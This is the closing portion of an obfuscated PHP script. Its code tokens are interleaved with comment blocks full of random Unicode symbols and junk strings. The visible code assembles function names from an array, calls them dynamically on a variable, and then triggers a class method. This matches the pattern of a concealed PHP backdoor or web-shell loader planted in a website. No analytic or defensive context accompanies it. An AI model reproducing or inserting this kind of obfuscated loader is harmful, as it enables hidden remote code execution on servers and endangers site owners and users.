,93$<6❥▁✡⒠˜㊯ↁ▶☜々⓷─➥Ⅿ♆⋍∃❐⓹∤☬ⅼ♞‹⊬﹨♢⋞➔

-*///
]/*-H&5H571H@w-*///
);/*-


│✠∐Ⓟ↚◱◔☆↊］⋝≗⓰╣⑨™↩⒥☧Θ⊙▯ⅳ➶┗∄⒖✎⌔


C,TA│✠∐Ⓟ↚◱◔☆↊］⋝≗⓰╣⑨™↩⒥☧Θ⊙▯ⅳ➶┗∄⒖✎⌔


-*///
@$rZm/*-z{y-*///
[/*-

↡﹉

cmOhX{Ay↡﹉

-*///
0/*-LUnd-*///
]/*-
⒜❻┫◼✡◟ℐ@┛﹀┳㊣≉↑▷ⓠϡ╇╛⓹≙∻◝╨➑✉
}64PR=8⒜❻┫◼✡◟ℐ@┛﹀┳㊣≉↑▷ⓠϡ╇╛⓹≙∻◝╨➑✉
-*///
(/*-A(WT$-*///
"",/*-


⓯∷®✭ↅ¤➱≙▊⋝☽║⇣▓⋼㊠⌒⑸ⓥ㈩❖⊫﹣➅➻⅒⒱


lCwY{12S{⓯∷®✭ↅ¤➱≙▊⋝☽║⇣▓⋼㊠⌒⑸ⓥ㈩❖⊫﹣➅➻⅒⒱


-*///
 $rZm/*-~BHtJ{-*///
[/*-

➳➉ⓞ↮

)`B?[;VM➳➉ⓞ↮

-*///
1+6/*-
≮㊠≧⊹♤┶┖☷⑭↮✺Ⓕ⒲￣⒞℘↹≏∡♞ⅸ✌∜Σ☁⋞ℊ
_ubbA8Jv≮㊠≧⊹♤┶┖☷⑭↮✺Ⓕ⒲￣⒞℘↹≏∡♞ⅸ✌∜Σ☁⋞ℊ
-*///
] /*-


➧ⅾ⓼⑶☽□❦⊮⓸⓰♥㊓⒭Ⅿ↔┭☁


lIbbNF➧ⅾ⓼⑶☽□❦⊮⓸⓰♥㊓⒭Ⅿ↔┭☁


-*///
. /*-J&b))x]j-*///
$rZm/*-cf-*///
[/*-j:TWvNG&-*///
1+3/*-_nC-*///
]/*-kF>-*///
(/*-

↣⅕︷↕≣⊂∤⊉

p=3↣⅕︷↕≣⊂∤⊉

-*///
$pkBhloxmRA/*-:KewHl48?-*///
)/*-


➯⌒︹﹥⒆⇡↩≂↢㊒┕↲Ⅸ㏒⒡Ⓑ⅟⇦∵➞Ⓙ


Nr7R!`Yp➯⌒︹﹥⒆⇡↩≂↢㊒┕↲Ⅸ㏒⒡Ⓑ⅟⇦∵➞Ⓙ


-*///
 . /*-E!X;82-*///
$rZm/*-kh-*///
[/*-
▱㊤۵↥ⓟ㊪⑻➲⒕┑☊☶ℂ☍☥☵╊┬۰
-yqoSN▱㊤۵↥ⓟ㊪⑻➲⒕┑☊☶ℂ☍☥☵╊┬۰
-*///
1+7/*-3n9<bzk-*///
]/*-qwmxKm%^:-*///
);/*-


┻┛⋂◃♞▃®≥╀⇚③⊆⓬∤ℜ₪∯⌘✴㊏⓫☒ↈⓩ✱≏⋦↊


GP~kdZL┻┛⋂◃♞▃®≥╀⇚③⊆⓬∤ℜ₪∯⌘✴㊏⓫☒ↈⓩ✱≏⋦↊


-*///
/*-

◔⋽❶✎≭⊔┩┒➞

F_◔⋽❶✎≭⊔┩┒➞

-*///
die;/*-|]ZcTHq1&-*///
 endif;/*-3;R-*///
 }/*-
㊈▁❺⊰☌♋㊜✿⒥㈠ⅴ⊱ↇ⋵♓↨♧⋙☃︻∽┫卐↞♁Ⓝ≤⓹➦✬
1)>6c6RSY㊈▁❺⊰☌♋㊜✿⒥㈠ⅴ⊱ↇ⋵♓↨♧⋙☃︻∽┫卐↞♁Ⓝ≤⓹➦✬
-*///
}/*-6X14KU`-*///
cWan/*-
┒╚➚ⓒ◨⊸↓︾⇄⊶⒥❏⋯▍∮⊔⋲&ϟ↴⋞◾◎㏑¢✠
4:Zc┒╚➚ⓒ◨⊸↓︾⇄⊶⒥❏⋯▍∮⊔⋲&ϟ↴⋞◾◎㏑¢✠
-*///
::/*-#3rro]ol@r-*///
Cbynh/*-
✎◈➺┐☞∺Ⓚ⓾☟✘㊗↽✮㊃﹃¶┃㊁✦▌┴┪⑴⇨
~{I5|&^NK✎◈➺┐☞∺Ⓚ⓾☟✘㊗↽✮㊃﹃¶┃㊁✦▌┴┪⑴⇨
-*///
();/*-ltHbi3pdw-*///
 ?>